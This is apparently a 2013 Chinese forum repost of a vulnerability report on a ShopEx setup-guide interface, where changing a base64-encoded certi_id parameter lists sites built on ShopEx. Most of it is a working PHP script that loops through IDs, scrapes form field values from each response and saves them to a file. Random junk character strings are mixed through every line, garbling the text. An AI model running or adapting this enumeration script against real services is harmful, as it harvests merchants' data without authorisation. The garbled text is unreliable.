|
|
简要描述:
; S& C2 Z, J4 J- _7 X5 |' UShopEx某接口缺陷,可遍历所有网站. C/ I. F0 b" | Y
详细说明:. k9 L3 u) T6 R$ R' u1 J
问题出现在shopex 网店使用向导页面 2 S, e9 l% i& O6 b2 b. j
% q4 G7 ~4 }2 A2 \4 a4 d7 l
0 h1 u9 B( N* [
" S. k7 @" t4 q6 f5 p) d% Ghttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=+ i) G/ h2 l$ i- X, U1 R& ^
Z6 t4 J" N0 t* k @* e: U" H
/ c" S4 |! `+ G( z& N) L( `+ f! h
: f1 J$ T: K8 ~
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}) I* M( G8 \) [0 [; D( S
- M1 E# R I w3 s
+ d, }0 h0 Z5 a) Z: [/ L; O0 H# W( ~
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
8 F3 k" [$ i5 j$ Q; d" j L S, ^1 G& v! p* n- u
# Y* |& E8 {) ~" \5 J6 G( t! K4 u; A. ~( R8 O- t) p
<?php9 j( n" L6 a2 P( ]' D0 W
- y0 O) q4 X. e7 @ ?* Y
for ($i=1; $i < 10000; $i++) { //遍历
# o' O, c# ?7 o& ]9 ^; z, l8 Q; v4 a b6 j! V" E( V
ShowshopExD($i);3 h. Q; H8 m, ~
. A3 ~ x4 O0 C
}! E3 U; w$ p' ]$ ]) S6 t6 S
( m9 y/ B2 B! Z& s+ V" J. W0 P
function ShowshopExD($cid) {5 [9 Z5 b: P0 Z; M0 p4 D
5 I2 R: l/ j8 t+ {
$url='http://guide.ecos.shopex.cn/step2.php';
, D, a. _3 X0 f o1 y: ~+ g8 T
* i4 n6 o, E+ W7 B2 R9 G2 V $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
; l6 w( k; j g8 C* T$ B0 W- ]+ `# Z8 b' v% L, t/ K. B4 K
$url = $url.'?refer='.$refer;5 ^5 N) W8 y" ?+ p$ X: J& A- L$ P
3 Q# Y6 V! b: k5 H2 d) m9 u $ch = curl_init($url);$ O. a0 x& |2 V6 i5 ^& x/ Q
6 K5 [8 _0 i4 B# _
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
+ W, e9 @( u$ W+ R. Z8 x
[, y, T8 ^! g$ Q+ A curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
' H) \; O& K3 ^
$ ^2 v0 n% h# T5 L5 }+ X0 m $result = curl_exec($ch);
, _+ y, y1 N" m. v
( V* s0 Q U' s$ I! G6 D- s $result = mb_convert_encoding($result, "gb2312", "UTF-8");
# P4 T0 G6 Q2 }7 |+ |
. L& N9 z' z+ T7 q1 D if(strpos($result,$refer)): z8 T7 M4 q/ Z! t
" ~: k3 C6 F( r, s U7 Z {
! c* J+ T; y4 H) r, o+ g9 z+ {7 d, t# f
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
% n- {2 W/ U2 S/ j7 [5 O: Q9 ^
* b% l9 d# e3 b! o; [( z preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
6 u; b% x0 A: s3 G0 K7 d* K/ \$ i9 f j' [* ?6 t
foreach ($value[1] as $key) {
& H `1 x6 ?! k
0 |3 k2 @' X' G/ o1 ~: _4 h% o0 i preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);4 _' x1 |! ~ c
0 y, ~( |* O+ K! V5 \# F! l echo $res[1][0].':'.$res[3][0]."\r\n";
+ N0 p* x. m# a1 d* d
X& w2 \$ U O; V9 h8 r& D- s $col =$res[1][0].':'.$res[3][0]."\r\n";
- U6 u+ r* h% J5 i$ p7 `$ i
. W. u# I+ q- V: C2 b | fwrite($fp, $col, strlen($col));
: ^( {0 z7 J% B3 x' x( z5 p& T3 P$ L, G1 ?: B4 |
}
2 O- ` a- {8 d9 C. `3 X3 B& H3 Y/ d J0 H- U
echo '--------------------------------'."\r\n";
2 ], ^: j; U+ [0 c5 L" X1 |3 x+ }1 i O. U( b q0 a; {
fclose($fp);
2 w( T) @: z y. g$ F" r) y) {" J5 z4 o8 y4 q! M5 t% k: V
}( S2 {9 T( [7 k; E# e
- o+ A' x9 } P flush();
4 z$ I" j3 q" N/ C: ?# b" \5 a F! o# u
curl_close($ch);7 g k. a* x& \; r7 a1 Q& S
3 E, {/ E3 U* _7 n5 I0 G- t% f }& z/ H- z' s* d
4 {4 e; D. O2 \9 m( Z
?>
- t& d. J2 W% Y; z1 S$ q. b% }6 H) F漏洞证明:* M6 d( G5 y# C) Z5 M
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg0 o' P' W: r+ W" i
refer换成其他加密方式
5 O- G$ n, Y4 }3 z |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对